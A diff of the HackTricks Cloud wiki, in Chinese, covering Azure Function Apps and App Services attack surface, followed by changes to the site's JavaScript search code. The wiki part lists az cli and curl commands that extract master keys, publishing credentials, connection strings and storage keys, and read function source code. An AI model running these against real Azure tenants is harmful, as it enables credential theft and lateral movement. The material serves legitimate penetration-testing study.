## Azure Function Apps
基本上 **Azure Function apps 是 Azure App Service 的一个子集**在 Web 控制台中,如果您访问 Web 控制台并列出所有应用服务或在 az cli 中执行 `az webapp list`,您将能够 **看到 Function apps 也列在其中**
基本上 **Azure Function apps 是 Azure App Service 的一个子集**,如果您访问 Web 控制台并列出所有应用服务或在 az cli 中执行 `az webapp list`,您将能够 **看到 Function apps 也列在其中**
因此,这两项服务实际上在 az cli 中大多数 **具有相同的配置、功能和选项**,尽管它们可能稍微不同的方式配置(例如 appsettings 的默认值或在 Function apps 中使用存储帐户)。
因此,这两项服务实际上在 az cli 中大多数 **具有相同的配置、功能和选项**,尽管它们可能稍微不同配置(例如 appsettings 的默认值或在 Function apps 中使用存储帐户)。
## Enumeration
@@ -176,6 +177,10 @@ az webapp conection list --name <name> --resource-group <res-group>
# Get hybrid-connections of a webapp
az webapp hybrid-connections list --name <name> --resource-group <res-group>
# Get configured SMC users by your account
az webapp deployment user show
## If any user is created, the username should appear in the "publishingUserName" field
```
{{#endtab }}
@@ -283,25 +288,25 @@ cd msdocs-python-flask-webapp-quickstart
# Create webapp from this code
az webapp up --runtime PYTHON:3.9 --sku B1 --logs
```
登录到 SCM 门户或通过 FTP 登录,可以在 `/wwwroot` 中看到压缩文件 `output.tar.gz`,该文件包含 webapp 的代码。
登录到SCM门户或通过FTP登录可以在`/wwwroot`中看到压缩文件`output.tar.gz`该文件包含webapp的代码。
> [!TIP]
> 仅通过 FTP 连接并修改文件 `output.tar.gz`不足以更改 webapp 执行的代码。
> 仅通过FTP连接并修改文件`output.tar.gz`不足以更改webapp执行的代码。
**攻击者可以下载此文件,修改它,然后重新上传以在 webapp 中执行任意代码。**
**攻击者可以下载此文件,修改它,然后再次上传以在webapp中执行任意代码。**
### 来自 GithubPython
### 来自GithubPython
本教程基于之前的教程,但使用 Github 存储库。
本教程基于之前的教程但使用Github存储库。
1. 在您的 Github户中分叉存储库 msdocs-python-flask-webapp-quickstart。
2. Azure 中创建一个新的 Python Web 应用。
3. `Deployment Center` 中更改源,使用 Github 登录,选择分叉的存储库并点击 `Save`
1. 在您的Github户中分叉repo msdocs-python-flask-webapp-quickstart。
2. 在Azure中创建一个新的python Web应用。
3.`Deployment Center`中更改源使用Github登录选择分叉的repo并点击`Save`
与之前的情况一样,登录到 SCM 门户或通过 FTP 登录,可以在 `/wwwroot` 中看到压缩文件 `output.tar.gz`,该文件包含 webapp 的代码。
与之前的情况一样登录到SCM门户或通过FTP登录可以在`/wwwroot`中看到压缩文件`output.tar.gz`该文件包含webapp的代码。
> [!TIP]
> 仅通过 FTP 连接并修改文件 `output.tar.gz` 并重新触发部署不足以更改 webapp 执行的代码。
> 仅通过FTP连接并修改文件`output.tar.gz`并重新触发部署不足以更改webapp执行的代码。
## 权限提升

86
src/pentesting-cloud/azure-security/az-services/az-function-apps.md
View File

@@ -4,7 +4,7 @@
## 基本信息
**Azure Function Apps** 是一种 **无服务器计算服务**,允许您运行小段代码,称为 **函数**,而无需管理底层基础设施。它们旨在响应各种触发器执行代码,例如 **HTTP 请求、定时器或来自其他 Azure 服务的事件**如 Blob 存储或事件中心。Function Apps 支持多种编程语言,包括 C#、Python、JavaScript 和 Java使其在构建 **事件驱动应用程序**、自动化工作流或集成服务方面具有多功能性。它们具有成本效益,因为您通常只需为代码运行时使用的计算时间付费。
**Azure Function Apps** 是一种 **无服务器计算服务**,允许您运行小段代码,称为 **函数**,而无需管理底层基础设施。它们旨在响应各种触发器执行代码,例如 **HTTP 请求、定时器或来自其他 Azure 服务**如 Blob 存储或事件中心)的事件。Function Apps 支持多种编程语言,包括 C#、Python、JavaScript 和 Java使其在构建 **事件驱动应用程序**、自动化工作流或集成服务方面具有多功能性。它们具有成本效益,因为您通常只需为代码运行时使用的计算时间付费。
> [!NOTE]
> 请注意,**Functions 是 App Services 的一个子集**,因此,这里讨论的许多功能也将被作为 Azure Apps 创建的应用程序使用(在 cli 中为 `webapp`)。
@@ -19,7 +19,7 @@
### **存储桶**
在创建一个新的非容器化的 Function App 时(但提供要运行的代码),**代码和其他与函数相关的数据将存储在存储帐户中**。默认情况下Web 控制台将为每个函数创建一个新的存储以存储代码。
在创建一个新的非容器化的 Function App 时(但提供要运行的代码),**代码和其他与函数相关的数据将存储在存储帐户中**。默认情况下Web 控制台将为每个函数创建一个新的存储帐户以存储代码。
此外,修改存储桶中的代码(以不同格式存储),**应用的代码将被修改为新的代码,并在下次调用函数时执行**。
@@ -36,38 +36,40 @@
使用 HTTP 触发器:
- 可以 **允许来自所有互联网的函数访问**,而无需任何身份验证或基于 IAM 的访问。尽管也可以限制此访问。
- 可以 **允许所有互联网用户访问函数**,而无需任何身份验证或基于 IAM 的访问。尽管也可以限制此访问。
- 还可以 **授予或限制****内部网络 (VPC)** 访问 Function App。
> [!CAUTION]
> 从攻击者的角度来看,这非常有趣,因为可能可以从暴露互联网的脆弱函数 **转移到内部网络**。
> 从攻击者的角度来看,这非常有趣,因为可能可以 **从暴露互联网的脆弱函数** 进行 **内部网络的横向移动**。
### **Function App 设置环境变量**
### **Function App 设置环境变量**
可以在应用内配置环境变量,这些变量可能包含敏感信息。此外,默认情况下会创建环境变量 **`AzureWebJobsStorage`** 和 **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`**(以及其他变量)。这些变量特别有趣,因为它们 **包含控制存储帐户的帐户密钥,具有完全权限**,该存储帐户包含应用程序的数据。这些设置在从存储帐户执行代码时也是必需的
可以在应用内配置环境变量,这些变量可能包含敏感信息。此外,默认情况下会创建环境变量 **`AzureWebJobsStorage`** 和 **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`**(以及其他变量)。这些变量特别有趣,因为它们 **包含控制存储帐户的帐户密钥,具有完全权限**,该存储帐户包含应用程序的数据。这些设置在从存储帐户执行代码时也很重要
这些环境变量或配置参数还控制函数如何执行代码,例如,如果存在 **`WEBSITE_RUN_FROM_PACKAGE`**,则会指示应用程序代码所在的 URL。
### **Function 沙箱**
在 Linux 沙箱中,源代码位于 **`/home/site/wwwroot`** 的文件 **`function_app.py`**(如果使用 Python运行代码的用户是 **`app`**(没有 sudo 权限)。
在 Linux 沙箱中,源代码位于 **`/home/site/wwwroot`** 的文件 **`function_app.py`**(如果使用 Python运行代码的用户是 **`app`**(没有 sudo 权限)。
在使用 NodeJS 的 **Windows** 函数中,代码位于 **`C:\home\site\wwwroot\HttpTrigger1\index.js`**,用户名是 **`mawsFnPlaceholder8_f_v4_node_20_x86`**,并属于以下 **组**`Mandatory Label\High Mandatory Level Label``Everyone``BUILTIN\Users``NT AUTHORITY\INTERACTIVE``CONSOLE LOGON``NT AUTHORITY\Authenticated Users``NT AUTHORITY\This Organization``BUILTIN\IIS_IUSRS``LOCAL``10-30-4-99\Dwas Site Users`
### **托管身份元数据**
### **托管身份元数据**
与 [**虚拟机**](vms/index.html) 一样Functions 可以具有 **托管身份**,分为两种类型:系统分配和用户分配。
**系统分配** 的身份是一个托管身份,**只有分配了该身份的函数** 可以使用,而 **用户分配** 的托管身份是 **任何其他 Azure 服务都可以使用的托管身份**
**系统分配** 的身份是一个托管身份,**只有分配了该身份的函数** 可以使用,而 **用户分配** 的托管身份是 **任何其他 Azure 服务都可以使用的托管身份**
> [!NOTE]
> 与 [**虚拟机**](vms/index.html) 一样Functions 可以具有 **1 个系统分配** 的托管身份和 **多个用户分配** 的托管身份,因此如果您破坏了该函数,始终重要的是尝试找到所有托管身份,因为您可能能够一个函数提升到多个托管身份。
> 与 [**虚拟机**](vms/index.html) 一样Functions 可以具有 **1 个系统分配** 的托管身份和 **多个用户分配** 的托管身份,因此如果您破坏了该函数,始终重要的是尝试找到所有托管身份,因为您可能能够通过一个函数提升到多个托管身份的权限
>
> 如果未使用系统托管身份,但一个或多个用户托管身份附加到函数,默认情况下您将无法获取任何令牌。
可以使用 [**PEASS 脚本**](https://github.com/peass-ng/PEASS-ng) 从元数据端点获取默认托管身份的令牌。或者您可以 **手动** 获取它们,如下所述:
可以使用 [**PEASS 脚本**](https://github.com/peass-ng/PEASS-ng) 从元数据端点获取默认托管身份的令牌。或者您可以 **手动** 获取,如下所述:
{% embed url="https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm" %}
{{#ref}}
https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm
{{#endref}}
请注意,您需要找到一种方法来 **检查函数附加的所有托管身份**,因为如果您不指明,元数据端点将 **仅使用默认身份**(有关更多信息,请查看前面的链接)。
@@ -76,7 +78,7 @@
> [!NOTE]
> 请注意,没有 RBAC 权限可以授予用户调用函数的访问权限。**函数调用取决于创建时选择的触发器**,如果选择了 HTTP 触发器,可能需要使用 **访问密钥**。
在使用 **HTTP 触发器** 创建函数内部的端点时,可以指明触发函数所需的 **访问密钥授权级别**。提供三种选项:
在使用 **HTTP 触发器** 的函数中创建端点时,可以指明触发函数所需的 **访问密钥授权级别**。提供三种选项:
- **ANONYMOUS****每个人**都可以通过 URL 访问该函数。
- **FUNCTION**:端点仅对使用 **函数、主机或主密钥** 的用户可访问。
@@ -86,7 +88,7 @@
- **函数密钥**:函数密钥可以是默认的或用户定义的,旨在仅授予对 Function App 中 **特定函数端点** 的访问权限,从而允许对端点进行更细粒度的访问。
- **主机密钥**:主机密钥也可以是默认的或用户定义的,提供对 Function App 中 **所有函数端点的访问,具有 FUNCTION 访问级别**
- **主密钥**:主密钥 (`_master`) 作为管理密钥,提供提升的权限,包括对所有函数端点的访问(包括 ADMIN 访问级别)。此 **密钥无法被撤销**
- **主密钥**:主密钥`_master`作为管理密钥,提供提升的权限,包括对所有函数端点的访问(包括 ADMIN 访问级别)。此 **密钥无法被撤销**
- **系统密钥**:系统密钥由 **特定扩展管理**,并且在访问内部组件使用的 webhook 端点时是必需的。示例包括事件网格触发器和可持久化函数,它们利用系统密钥与各自的 API 安全交互。
> [!TIP]
@@ -96,7 +98,7 @@
### 基本身份验证
与应用服务一样Functions 也支持基本身份验证,以通过 **SCM****FTP** 连接以使用 Azure 提供的 **用户名和密码的 URL** 部署代码。有关更多信息,请参见:
与应用服务一样Functions 也支持基本身份验证,以连接到 **SCM****FTP**使用 Azure 提供的 **用户名和密码的 URL** 部署代码。有关更多信息,请参见:
{{#ref}}
az-app-services.md
@@ -104,7 +106,7 @@ az-app-services.md
### 基于 Github 的部署
当函数从 Github 仓库生成时Azure Web 控制台允许在特定仓库中 **自动创建 Github 工作流**因此每当该仓库更新时函数的代码也会更新。实际上Python 函数的 Github Action yaml 如下所示:
当函数从 Github 仓库生成时Azure Web 控制台允许 **在特定仓库中自动创建 Github 工作流**因此每当该仓库更新时函数的代码也会更新。实际上Python 函数的 Github Action yaml 如下所示:
<details>
@@ -195,13 +197,13 @@ package: ${{ env.AZURE_FUNCTIONAPP_PACKAGE_PATH }}
此外,**托管身份**也会被创建以便来自仓库的Github Action能够使用它登录到Azure。这是通过在**托管身份**上生成一个联邦凭证来完成的,允许**发行者** `https://token.actions.githubusercontent.com` 和**主题标识符** `repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>`
> [!CAUTION]
> 因此,任何妥协该仓库的人都将能够妥协该功能及其附加的托管身份。
> 因此,任何妥协该仓库的人都将能够妥协该函数及其附加的托管身份。
### 基于容器的部署
并非所有计划都允许部署容器但对于允许的计划配置将包含容器的URL。在API中**`linuxFxVersion`**设置将类似于:`DOCKER|mcr.microsoft.com/...`而在Web控制台中配置将显示**镜像设置**。
并非所有计划都允许部署容器但对于允许的计划配置将包含容器的URL。在API中**`linuxFxVersion`** 设置将类似于: `DOCKER|mcr.microsoft.com/...`而在Web控制台中配置将显示**镜像设置**。
此外,**不会在与该功能相关的存储**帐户中存储源代码,因为这不是必需的
此外,**与该函数相关的存储账户中不会存储任何源代码**,因为不需要
## 枚举
@@ -211,10 +213,10 @@ package: ${{ env.AZURE_FUNCTIONAPP_PACKAGE_PATH }}
# List all the functions
az functionapp list
# Get info of 1 funciton (although in the list you already get this info)
az functionapp show --name <app-name> --resource-group <res-group>
## If "linuxFxVersion" has something like: "DOCKER|mcr.microsoft.com/..."
## This is using a container
# List functions in an function-app (endpoints)
az functionapp function list \
--name <app-name> \
--resource-group <res-group>
# Get details about the source of the function code
az functionapp deployment source show \
@@ -231,6 +233,9 @@ az functionapp config container show \
# Get settings (and privesc to the sorage account)
az functionapp config appsettings list --name <app-name> --resource-group <res-group>
# Get access restrictions
az functionapp config access-restriction show --name <app-name> --resource-group <res-group>
# Check if a domain was assigned to a function app
az functionapp config hostname list --webapp-name <app-name> --resource-group <res-group>
@@ -240,22 +245,41 @@ az functionapp config ssl list --resource-group <res-group>
# Get network restrictions
az functionapp config access-restriction show --name <app-name> --resource-group <res-group>
# Get more info about a function (invoke_url_template is the URL to invoke and script_href allows to see the code)
az rest --method GET \
--url "https://management.azure.com/subscriptions/<subscription>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions?api-version=2024-04-01"
# Get acess restrictions
az functionapp config access-restriction show --name <app-name> --resource-group <res-group>
# Get connection strings
az rest --method POST --uri "https://management.azure.com/subscriptions/<subscription>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/config/connectionstrings/list?api-version=2022-03-01"
az rest --method GET --uri "https://management.azure.com/subscriptions/<subscription>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/config/configreferences/connectionstrings?api-version=2022-03-01"
# Get SCM credentials
az functionapp deployment list-publishing-credentials --name <app-name> --resource-group <res-group>
# Get function, system and master keys
az functionapp keys list --name <app-name> --resource-group <res-group>
# Get Host key
az rest --method POST --uri "https://management.azure.com/<subscription>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions/<function-endpoint-name>/listKeys?api-version=2022-03-01"
# Get source code with Master Key of the function
curl "<script_href>?code=<master-key>"
## Python example
curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=<master-key>" -v
curl "https://<func-app-name>.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=<master-key>" -v
# Get source code using SCM access (Azure permissions or SCM creds)
az rest --method GET \
--url "https://<func-app-name>.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=<master-key>" \
--resource "https://management.azure.com/"
# Get source code with Azure permissions
az rest --url "https://management.azure.com/subscriptions/<subscription>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01"
## Another example
az rest --url "https://management.azure.com/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Web/sites/ConsumptionExample/hostruntime/admin/vfs/HttpExample/index.js?relativePath=1&api-version=2022-03-01"
# Get source code
az rest --url "https://management.azure.com/<subscription>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01"
```
{{#endtab }}
{{#tab name="Az Powershell" }}
```powershell
```bash
Get-Command -Module Az.Functions
# Lists all Function Apps in the current subscription or in a specific resource group.

10
theme/elasticlunr.min.js vendored Normal file
View File

File diff suppressed because one or more lines are too long

720
theme/ht_searcher.js
View File

@@ -1,554 +1,172 @@
/* ────────────────────────────────────────────────────────────────
Polyfill so requestIdleCallback works everywhere (IE 11/Safari)
─────────────────────────────────────────────────────────────── */
if (typeof window.requestIdleCallback !== "function") {
window.requestIdleCallback = function (cb) {
const start = Date.now();
return setTimeout(function () {
cb({
didTimeout: false,
timeRemaining: function () {
return Math.max(0, 50 - (Date.now() - start));
}
});
}, 1);
};
window.cancelIdleCallback = window.clearTimeout;
}
/* ────────────────────────────────────────────────────────────────
search.js
─────────────────────────────────────────────────────────────── */
/* ht_searcher.js ────────────────────────────────────────────────
Dualindex WebWorker search (HackTricks + HackTricksCloud)
· keeps working even if one index fails
· cloud results rendered **blue**
· ⏳ while loading → 🔍 when ready
*/
(() => {
"use strict";
window.search = window.search || {};
(function search(search) {
// Search functionality
//
// You can use !hasFocus() to prevent keyhandling in your key
// event handlers while the user is typing their search.
if (!Mark || !elasticlunr) {
return;
/* ───────────── 0. helpers (main thread) ───────────── */
const clear = el => { while (el.firstChild) el.removeChild(el.firstChild); };
/* ───────────── 1. WebWorker code ─────────────────── */
const workerCode = `
self.window = self;
self.search = self.search || {};
const abs = p => location.origin + p;
/* 1 — elasticlunr */
try { importScripts('https://cdn.jsdelivr.net/npm/elasticlunr@0.9.5/elasticlunr.min.js'); }
catch { importScripts(abs('/elasticlunr.min.js')); }
/* 2 — load a single index (remote → local) */
async function loadIndex(remote, local, isCloud=false){
let rawLoaded = false;
try {
const r = await fetch(remote,{mode:'cors'});
if (!r.ok) throw new Error('HTTP '+r.status);
importScripts(URL.createObjectURL(new Blob([await r.text()],{type:'application/javascript'})));
rawLoaded = true;
} catch(e){ console.warn('remote',remote,'failed →',e); }
if(!rawLoaded){
try { importScripts(abs(local)); rawLoaded = true; }
catch(e){ console.error('local',local,'failed →',e); }
}
//IE 11 Compatibility from https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/startsWith
if (!String.prototype.startsWith) {
String.prototype.startsWith = function(search, pos) {
return this.substr(!pos || pos < 0 ? 0 : +pos, search.length) === search;
};
}
var search_wrap = document.getElementById('search-wrapper'),
search_modal = document.getElementById('search-modal'),
searchbar = document.getElementById('searchbar'),
searchbar_outer = document.getElementById('searchbar-outer'),
searchresults = document.getElementById('searchresults'),
searchresults_outer = document.getElementById('searchresults-outer'),
searchresults_header = document.getElementById('searchresults-header'),
searchicon = document.getElementById('search-toggle'),
content = document.getElementById('content'),
searchindex = null,
doc_urls = [],
results_options = {
teaser_word_count: 30,
limit_results: 30,
},
search_options = {
bool: "AND",
expand: true,
fields: {
title: {boost: 1},
body: {boost: 1},
breadcrumbs: {boost: 0}
}
},
mark_exclude = [],
marker = new Mark(content),
current_searchterm = "",
URL_SEARCH_PARAM = 'search',
URL_MARK_PARAM = 'highlight',
teaser_count = 0,
SEARCH_HOTKEY_KEYCODE = 83,
ESCAPE_KEYCODE = 27,
DOWN_KEYCODE = 40,
UP_KEYCODE = 38,
SELECT_KEYCODE = 13;
function hasFocus() {
return searchbar === document.activeElement;
}
function removeChildren(elem) {
while (elem.firstChild) {
elem.removeChild(elem.firstChild);
}
}
// Helper to parse a url into its building blocks.
function parseURL(url) {
var a = document.createElement('a');
a.href = url;
return {
source: url,
protocol: a.protocol.replace(':',''),
host: a.hostname,
port: a.port,
params: (function(){
var ret = {};
var seg = a.search.replace(/^\?/,'').split('&');
var len = seg.length, i = 0, s;
for (;i<len;i++) {
if (!seg[i]) { continue; }
s = seg[i].split('=');
ret[s[0]] = s[1];
}
return ret;
})(),
file: (a.pathname.match(/\/([^/?#]+)$/i) || [,''])[1],
hash: a.hash.replace('#',''),
path: a.pathname.replace(/^([^/])/,'/$1')
};
}
// Helper to recreate a url string from its building blocks.
function renderURL(urlobject) {
var url = urlobject.protocol + "://" + urlobject.host;
if (urlobject.port != "") {
url += ":" + urlobject.port;
}
url += urlobject.path;
var joiner = "?";
for(var prop in urlobject.params) {
if(urlobject.params.hasOwnProperty(prop)) {
url += joiner + prop + "=" + urlobject.params[prop];
joiner = "&";
}
}
if (urlobject.hash != "") {
url += "#" + urlobject.hash;
}
return url;
}
// Helper to escape html special chars for displaying the teasers
var escapeHTML = (function() {
var MAP = {
'&': '&amp;',
'<': '&lt;',
'>': '&gt;',
'"': '&#34;',
"'": '&#39;'
};
var repl = function(c) { return MAP[c]; };
return function(s) {
return s.replace(/[&<>'"]/g, repl);
};
})();
function formatSearchMetric(count, searchterm) {
if (count == 1) {
return count + " search result for '" + searchterm + "':";
} else if (count == 0) {
return "No search results for '" + searchterm + "'.";
} else {
return count + " search results for '" + searchterm + "':";
}
}
function formatSearchResult(result, searchterms) {
var teaser = makeTeaser(escapeHTML(result.doc.body), searchterms);
teaser_count++;
// The ?URL_MARK_PARAM= parameter belongs inbetween the page and the #heading-anchor
var url = doc_urls[result.ref].split("#");
if (url.length == 1) { // no anchor found
url.push("");
}
// encodeURIComponent escapes all chars that could allow an XSS except
// for '. Due to that we also manually replace ' with its url-encoded
// representation (%27).
var searchterms = encodeURIComponent(searchterms.join(" ")).replace(/\'/g, "%27");
return '<a href="' + path_to_root + url[0] + '?' + URL_MARK_PARAM + '=' + searchterms + '#' + url[1]
+ '" aria-details="teaser_' + teaser_count + '">' + result.doc.breadcrumbs
+ '<span class="teaser" id="teaser_' + teaser_count + '" aria-label="Search Result Teaser">'
+ teaser + '</span>' + '</a>';
}
function makeTeaser(body, searchterms) {
// The strategy is as follows:
// First, assign a value to each word in the document:
// Words that correspond to search terms (stemmer aware): 40
// Normal words: 2
// First word in a sentence: 8
// Then use a sliding window with a constant number of words and count the
// sum of the values of the words within the window. Then use the window that got the
// maximum sum. If there are multiple maximas, then get the last one.
// Enclose the terms in <em>.
var stemmed_searchterms = searchterms.map(function(w) {
return elasticlunr.stemmer(w.toLowerCase());
});
var searchterm_weight = 40;
var weighted = []; // contains elements of ["word", weight, index_in_document]
// split in sentences, then words
var sentences = body.toLowerCase().split('. ');
var index = 0;
var value = 0;
var searchterm_found = false;
for (var sentenceindex in sentences) {
var words = sentences[sentenceindex].split(' ');
value = 8;
for (var wordindex in words) {
var word = words[wordindex];
if (word.length > 0) {
for (var searchtermindex in stemmed_searchterms) {
if (elasticlunr.stemmer(word).startsWith(stemmed_searchterms[searchtermindex])) {
value = searchterm_weight;
searchterm_found = true;
}
};
weighted.push([word, value, index]);
value = 2;
}
index += word.length;
index += 1; // ' ' or '.' if last word in sentence
};
index += 1; // because we split at a two-char boundary '. '
};
if (weighted.length == 0) {
return body;
}
var window_weight = [];
var window_size = Math.min(weighted.length, results_options.teaser_word_count);
var cur_sum = 0;
for (var wordindex = 0; wordindex < window_size; wordindex++) {
cur_sum += weighted[wordindex][1];
};
window_weight.push(cur_sum);
for (var wordindex = 0; wordindex < weighted.length - window_size; wordindex++) {
cur_sum -= weighted[wordindex][1];
cur_sum += weighted[wordindex + window_size][1];
window_weight.push(cur_sum);
};
if (searchterm_found) {
var max_sum = 0;
var max_sum_window_index = 0;
// backwards
for (var i = window_weight.length - 1; i >= 0; i--) {
if (window_weight[i] > max_sum) {
max_sum = window_weight[i];
max_sum_window_index = i;
}
};
} else {
max_sum_window_index = 0;
}
// add <em/> around searchterms
var teaser_split = [];
var index = weighted[max_sum_window_index][2];
for (var i = max_sum_window_index; i < max_sum_window_index+window_size; i++) {
var word = weighted[i];
if (index < word[2]) {
// missing text from index to start of `word`
teaser_split.push(body.substring(index, word[2]));
index = word[2];
}
if (word[1] == searchterm_weight) {
teaser_split.push("<em>")
}
index = word[2] + word[0].length;
teaser_split.push(body.substring(word[2], index));
if (word[1] == searchterm_weight) {
teaser_split.push("</em>")
}
};
return teaser_split.join('');
}
function init(config) {
results_options = config.results_options;
search_options = config.search_options;
searchbar_outer = config.searchbar_outer;
doc_urls = config.doc_urls;
searchindex = elasticlunr.Index.load(config.index);
// Set up events
searchicon.addEventListener('click', function(e) { searchIconClickHandler(); }, false);
search_wrap.addEventListener('click', function(e) { searchIconClickHandler(); }, false);
search_modal.addEventListener('click', function(e) { e.stopPropagation(); }, false);
searchbar.addEventListener('keyup', function(e) { searchbarKeyUpHandler(); }, false);
document.addEventListener('keydown', function(e) { globalKeyHandler(e); }, false);
// If the user uses the browser buttons, do the same as if a reload happened
window.onpopstate = function(e) { doSearchOrMarkFromUrl(); };
// Suppress "submit" events so the page doesn't reload when the user presses Enter
document.addEventListener('submit', function(e) { e.preventDefault(); }, false);
// If reloaded, do the search or mark again, depending on the current url parameters
doSearchOrMarkFromUrl();
}
function unfocusSearchbar() {
// hacky, but just focusing a div only works once
var tmp = document.createElement('input');
tmp.setAttribute('style', 'position: absolute; opacity: 0;');
searchicon.appendChild(tmp);
tmp.focus();
tmp.remove();
}
// On reload or browser history backwards/forwards events, parse the url and do search or mark
function doSearchOrMarkFromUrl() {
// Check current URL for search request
var url = parseURL(window.location.href);
if (url.params.hasOwnProperty(URL_SEARCH_PARAM)
&& url.params[URL_SEARCH_PARAM] != "") {
showSearch(true);
searchbar.value = decodeURIComponent(
(url.params[URL_SEARCH_PARAM]+'').replace(/\+/g, '%20'));
searchbarKeyUpHandler(); // -> doSearch()
} else {
showSearch(false);
}
if (url.params.hasOwnProperty(URL_MARK_PARAM)) {
var words = decodeURIComponent(url.params[URL_MARK_PARAM]).split(' ');
marker.mark(words, {
exclude: mark_exclude
});
var markers = document.querySelectorAll("mark");
function hide() {
for (var i = 0; i < markers.length; i++) {
markers[i].classList.add("fade-out");
window.setTimeout(function(e) { marker.unmark(); }, 300);
}
}
for (var i = 0; i < markers.length; i++) {
markers[i].addEventListener('click', hide);
}
}
}
// Eventhandler for keyevents on `document`
function globalKeyHandler(e) {
if (e.altKey || e.ctrlKey || e.metaKey || e.shiftKey || e.target.type === 'textarea' || e.target.type === 'text' || !hasFocus() && /^(?:input|select|textarea)$/i.test(e.target.nodeName)) { return; }
if (e.keyCode === ESCAPE_KEYCODE) {
e.preventDefault();
searchbar.classList.remove("active");
setSearchUrlParameters("",
(searchbar.value.trim() !== "") ? "push" : "replace");
if (hasFocus()) {
unfocusSearchbar();
}
showSearch(false);
marker.unmark();
} else if (!hasFocus() && e.keyCode === SEARCH_HOTKEY_KEYCODE) {
e.preventDefault();
showSearch(true);
window.scrollTo(0, 0);
searchbar.select();
} else if (hasFocus() && e.keyCode === DOWN_KEYCODE) {
e.preventDefault();
unfocusSearchbar();
searchresults.firstElementChild.classList.add("focus");
} else if (!hasFocus() && (e.keyCode === DOWN_KEYCODE
|| e.keyCode === UP_KEYCODE
|| e.keyCode === SELECT_KEYCODE)) {
// not `:focus` because browser does annoying scrolling
var focused = searchresults.querySelector("li.focus");
if (!focused) return;
e.preventDefault();
if (e.keyCode === DOWN_KEYCODE) {
var next = focused.nextElementSibling;
if (next) {
focused.classList.remove("focus");
next.classList.add("focus");
}
} else if (e.keyCode === UP_KEYCODE) {
focused.classList.remove("focus");
var prev = focused.previousElementSibling;
if (prev) {
prev.classList.add("focus");
} else {
searchbar.select();
}
} else { // SELECT_KEYCODE
window.location.assign(focused.querySelector('a'));
}
}
}
function showSearch(yes) {
if (yes) {
search_wrap.classList.remove('hidden');
searchicon.setAttribute('aria-expanded', 'true');
} else {
search_wrap.classList.add('hidden');
searchicon.setAttribute('aria-expanded', 'false');
var results = searchresults.children;
for (var i = 0; i < results.length; i++) {
results[i].classList.remove("focus");
}
}
}
function showResults(yes) {
if (yes) {
searchresults_outer.classList.remove('hidden');
} else {
searchresults_outer.classList.add('hidden');
}
}
// Eventhandler for search icon
function searchIconClickHandler() {
if (search_wrap.classList.contains('hidden')) {
showSearch(true);
window.scrollTo(0, 0);
searchbar.select();
} else {
showSearch(false);
}
}
// Eventhandler for keyevents while the searchbar is focused
function searchbarKeyUpHandler() {
var searchterm = searchbar.value.trim();
if (searchterm != "") {
searchbar.classList.add("active");
doSearch(searchterm);
} else {
searchbar.classList.remove("active");
showResults(false);
removeChildren(searchresults);
}
setSearchUrlParameters(searchterm, "push_if_new_search_else_replace");
// Remove marks
marker.unmark();
}
// Update current url with ?URL_SEARCH_PARAM= parameter, remove ?URL_MARK_PARAM and #heading-anchor .
// `action` can be one of "push", "replace", "push_if_new_search_else_replace"
// and replaces or pushes a new browser history item.
// "push_if_new_search_else_replace" pushes if there is no `?URL_SEARCH_PARAM=abc` yet.
function setSearchUrlParameters(searchterm, action) {
var url = parseURL(window.location.href);
var first_search = ! url.params.hasOwnProperty(URL_SEARCH_PARAM);
if (searchterm != "" || action == "push_if_new_search_else_replace") {
url.params[URL_SEARCH_PARAM] = searchterm;
delete url.params[URL_MARK_PARAM];
url.hash = "";
} else {
delete url.params[URL_MARK_PARAM];
delete url.params[URL_SEARCH_PARAM];
}
// A new search will also add a new history item, so the user can go back
// to the page prior to searching. A updated search term will only replace
// the url.
if (action == "push" || (action == "push_if_new_search_else_replace" && first_search) ) {
history.pushState({}, document.title, renderURL(url));
} else if (action == "replace" || (action == "push_if_new_search_else_replace" && !first_search) ) {
history.replaceState({}, document.title, renderURL(url));
}
}
function doSearch(searchterm) {
// Don't search the same twice
if (current_searchterm == searchterm) { return; }
else { current_searchterm = searchterm; }
if (searchindex == null) { return; }
// Do the actual search
var results = searchindex.search(searchterm, search_options);
var resultcount = Math.min(results.length, results_options.limit_results);
// Display search metrics
searchresults_header.innerText = formatSearchMetric(resultcount, searchterm);
// Clear and insert results
var searchterms = searchterm.split(' ');
removeChildren(searchresults);
for(var i = 0; i < resultcount ; i++){
var resultElem = document.createElement('li');
resultElem.innerHTML = formatSearchResult(results[i], searchterms);
searchresults.appendChild(resultElem);
}
// Display results
showResults(true);
}
(async function loadSearchIndex(lang = window.lang || "en") {
const branch = lang === "en" ? "master" : lang;
const rawUrl =
`https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-cloud/refs/heads/${branch}/searchindex.js`;
const localJs = "/searchindex.js";
const TIMEOUT_MS = 10_000;
const injectScript = (src) =>
new Promise((resolve, reject) => {
const s = document.createElement("script");
s.src = src;
s.onload = () => resolve(src);
s.onerror = (e) => reject(e);
document.head.appendChild(s);
if(!rawLoaded) return null; /* give up on this index */
const data = { json:self.search.index, urls:self.search.doc_urls, cloud:isCloud };
delete self.search.index; delete self.search.doc_urls;
return data;
}
(async () => {
const MAIN_RAW = 'https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/refs/heads/master/searchindex.js';
